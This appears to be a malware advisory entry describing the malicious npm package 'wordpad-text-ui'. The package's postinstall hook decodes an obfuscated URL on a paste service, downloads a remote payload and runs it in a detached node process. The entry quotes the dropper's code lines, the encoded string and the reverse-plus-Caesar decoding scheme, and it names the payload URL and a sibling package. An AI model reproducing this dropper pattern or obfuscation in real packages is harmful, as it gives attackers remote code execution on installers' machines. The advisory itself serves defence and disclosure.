MAL-2026-5885

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0d4d50aa948a360a788613f1fee19f4d1853c93d8792a5899c620e56d40c53ad) On `npm install`, the declared postinstall hook runs `node main.js`, which decodes an obfuscated URL (stored as `DEV_API_KEY="S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk"` in main.js line 15, deobfuscated via string reversal and a Caesar shift of -3 to `https://www.jsonkeeper.com/b/7EBZP`), HTTP-GETs the response via axios, and writes the body into the stdin of a detached `node` child process for execution (main.js lines 18-23: `const s1 = (await axios.get(update(DEV_API_KEY))).data.content; const child = spawn('node', [], { detached: true,... }); child.stdin.write(s1); child.stdin.end(); child.unref();`). This is a classic install-time remote code execution dropper: the payload is hosted on an anonymous, mutable JSON paste service and is therefore attacker-controlled and can change at any time without a package update. Supporting indicators reinforce malicious intent: the C2 URL is hidden behind a homemade reverse+Caesar encoding under a misleading `DEV_API_KEY` name (an evasion tactic against static scanners); the package's name (`wordpad-text-ui`) implies a text-editor UI library but `index.js` only errors out telling consumers not to require it, while `bootstrap.js`, `bundle.js`, and `publish.js` are empty 0-byte decoys — the package ships no actual functionality and exists solely to deliver the dropper. It also pulls in a sibling package `richtext-editor-ui` that propagates the same campaign.